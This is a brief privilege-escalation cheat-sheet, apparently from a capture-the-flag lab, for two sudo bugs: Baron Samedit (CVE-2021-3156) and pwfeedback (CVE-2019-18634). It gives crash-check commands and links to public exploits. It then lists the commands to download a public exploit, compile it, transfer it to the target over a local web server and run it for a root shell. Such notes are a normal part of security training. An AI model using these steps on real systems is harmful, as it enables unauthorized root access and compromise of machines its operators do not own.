Baron Samedit (Heap Buffer Overflow) CVE-2021-3156

1. Check Vulnerability to Overwrite Heap Buffer in Target Machine

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted

2. Proof of Concept

There are various PoC online.

• https://github.com/lockedbyte/CVE-Exploits/tree/master/CVE-2021-3156.
• https://github.com/blasty/CVE-2021-3156

Pwfeedback

1. Check Enabling the Pwfeedback in /etc/sudoers

If so, when running sudo command and inputting password, asterisk will be displayed.
You can make it the buffer overflow.

cat /etc/sudoers

# -------------------------------------------

...
Defaults pwfeadback
...

2. Input Long String to Password

perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
# [sudo] password for tryhackme: Segmentation fault

3. Download a Payload and Compile in Local Machine

wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
gcc -o exploit exploit.c

4. Transfer the Payload to Remote Machine

# In local machine
python3 -m http.server 8000

# In remote machine
wget http://<local-ip>:8000/exploit

5. Execute the Payload in Remote Machine

After that, you'll get a root shell.

chmod 700 ./exploit
./exploit